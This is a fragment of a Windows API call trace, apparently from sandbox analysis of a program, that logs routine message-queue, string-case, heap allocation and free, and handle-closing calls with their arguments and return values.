0xd [0253.042] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.042] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.042] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0253.042] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.042] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0253.042] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.043] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.043] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.043] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.043] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.043] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.043] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.043] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.043] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.043] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.043] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.043] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.043] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.043] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.043] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.043] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0253.044] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.044] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0253.044] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.044] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.044] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0253.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.046] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0253.046] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.046] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0253.046] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0253.047] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0253.047] FreeLibrary (hLibModule=0x74d40000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0253.047] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.047] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0253.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.047] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0253.048] CloseHandle (hObject=0x294) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0253.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0253.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0253.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0253.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0253.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0253.052] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0253.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0253.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0253.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0253.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0253.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0253.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0253.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.053] CloseHandle (hObject=0x2cc) returned 1 [0253.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0253.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0253.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0253.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0253.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0253.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0253.056] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0253.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0253.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0253.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0253.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0253.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 